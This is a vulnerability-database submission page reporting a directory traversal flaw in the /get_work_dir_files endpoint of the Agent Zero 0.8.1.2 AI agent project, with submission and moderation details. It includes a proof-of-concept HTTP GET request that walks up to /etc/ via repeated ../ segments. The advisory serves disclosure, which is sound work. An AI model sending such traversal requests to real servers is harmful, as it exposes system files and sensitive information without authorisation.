Submit #546220: frdel Agent Zero 0.8.1.2 File and Directory Information Exposureinfo

Titelfrdel Agent Zero 0.8.1.2 File and Directory Information Exposure
BeschreibungAgent-Zero is an AI agent project with 6.4K GitHub favorites, and its /get_work_dir_files interface has a directory traversal vulnerability, which can be used by attackers to obtain the target server architecture and sensitive information GET /get_work_dir_files?path=../../../../../../../etc/ HTTP/1.1 Host: host User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Accept: */* Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Connection: close
Quelle⚠️ https://github.com/frdel/agent-zero
Benutzer
 ekkoo (UID 83509)
Einreichung30.03.2025 19:09 (vor 1 Jahr)
Moderieren13.04.2025 19:42 (14 days later)
StatusAkzeptiert
VulDB Eintrag304588 [frdel Agent-Zero 0.8.1.2 /get_work_dir_files path Directory Traversal]
Punkte20

ZurückÜbersichtWeiter

Might our Artificial Intelligence support you?

Check our Alexa App!